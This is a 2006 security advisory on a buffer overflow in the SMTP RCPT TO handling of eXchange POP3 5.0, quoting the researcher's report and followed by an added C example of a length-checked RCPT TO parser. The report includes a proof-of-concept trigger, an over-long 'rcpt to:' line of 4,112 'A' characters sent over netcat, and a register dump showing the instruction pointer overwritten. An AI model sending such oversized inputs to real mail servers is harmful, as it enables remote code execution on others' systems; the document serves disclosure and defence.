


Category:   Application (E-mail Server)  >   eXchange POP3
Vendors:   Kinesphere Corporation
eXchange POP3 Server Buffer Overflow in SMTP RCPT TO Command Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015580
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 3 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 5.0 (build 050203)
Description:   securma massine from MorX Security Research Team reported a vulnerability in eXchange POP3. A remote user can execute arbitrary code on the target system.

A remote user can connect to the target SMTP service and send a specially crafted SMTP RCPT TO command parameter to trigger a buffer overflow. This can be exploited to execute arbitrary code on the target system.

A demonstration exploit command is provided:

rcpt to:<AAAAAA....("A"x4112)

The vendor was notified on January 16, 2006.

A demonstration exploit is available at:

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version (5.0 build 060125), available at:

Vendor URL:
Cause:   Boundary error
Underlying OS:  Windows (Any)
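
Added example (not part of the alert and not the vendor's code; the alert does not describe how the fixed build handles the command): a bounds-checked RCPT TO parser that rejects the over-long parameter described above before any copy takes place. The function name parse_rcpt_to and the sample inputs are constructed for illustration; the 512-octet command-line and 256-octet path limits are the ones given in RFC 5321.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define SMTP_MAX_LINE 512 /* RFC 5321 4.5.3.1.4: command line incl. CRLF */
#define SMTP_MAX_PATH 256 /* RFC 5321 4.5.3.1.3: forward-path incl. "<>" */

/* Hypothetical helper (not vendor code). line is the received command of
 * line_len bytes and need not be NUL-terminated. On 250 the address without
 * angle brackets is in out. Returns the SMTP reply code to send. */
int parse_rcpt_to(const char *line, size_t line_len, char *out, size_t out_cap)
{
    static const char verb[] = "RCPT TO:";
    const size_t verb_len = sizeof verb - 1;
    const char *lt, *gt;
    size_t i, path_len;
    if (line_len > SMTP_MAX_LINE)
        return 500; /* line too long: refuse before any parsing or copying */
    if (line_len < verb_len)
        return 501;
    for (i = 0; i < verb_len; i++)
        if (toupper((unsigned char)line[i]) != verb[i])
            return 501;
    lt = memchr(line + verb_len, '<', line_len - verb_len);
    if (lt == NULL)
        return 501;
    gt = memchr(lt, '>', line_len - (size_t)(lt - line));
    if (gt == NULL)
        return 501; /* unterminated path */
    path_len = (size_t)(gt - lt) - 1; /* bytes between '<' and '>' */
    if (path_len == 0 || path_len + 2 > SMTP_MAX_PATH)
        return 501; /* empty or over-long path */
    if (path_len + 1 > out_cap)
        return 451; /* local buffer too small: fail closed, never truncate */
    memcpy(out, lt + 1, path_len);
    out[path_len] = '\0';
    return 250;
}

int main(void)
{
    char out[SMTP_MAX_PATH], big[9 + 4112]; /* constructed sample input */
    const char ok[] = "RCPT TO:<user@example.com>\r\n";
    memcpy(big, "rcpt to:<", 9);
    memset(big + 9, 'A', 4112); /* same shape as the advisory's command */
    printf("%d\n", parse_rcpt_to(big, sizeof big, out, sizeof out));
    printf("%d %s\n", parse_rcpt_to(ok, sizeof ok - 1, out, sizeof out), out);
    return 0;
}
```

The length checks run on the byte count reported by the socket read, so the result does not depend on the sender terminating the line or closing the angle bracket.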

Message History:   None.

 Source Message Contents

Subject:  Exchangepop3 v5 rcpt buffer overflow vulnerability

Author: securma massine <>
MorX Security Research Team
Product info :
EXchangepop3 is an email gateway (connector) that retrieves messages from Internet POP3 
email accounts and delivers them to Exchange Server.
Vulnerability Description:
eXchangepop3 is vulnerable to a buffer overflow attack.
Boundary errors in the handling of the RCPT TO (SMTP) command allow remote users, by
sending a large buffer, to set a new instruction pointer, execute arbitrary code
and gain access to the system.
C:\>nc 25
220 aaa ESMTP
mail  [enter]
250 OK
rcpt to:<AAAAAA....("A"x4112)
we have :
eax=00000001 ebx=007334e0 ecx=41414141 edx=7c91eb94 esi=00455a38 edi=0f010001
eip=41414141 esp=0221f750 ebp=00000001 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
41414141 ??               ???
Affected Software(s):
Exchangepop3 v 5.0 (build 050203)
Affected platform(s):
Exploit/Proof of Concept:
Solution :
The vendor has released a new build fixing the problem :
The build number is 060125.
14/01/2006  initial vendor contact
16/01/2006  vendor received details about the vulnerability
02/02/2006  vendor released the fixed build
This entire document is for educational, testing and demonstration purposes only.
Greets to undisputed and  all MorX members.

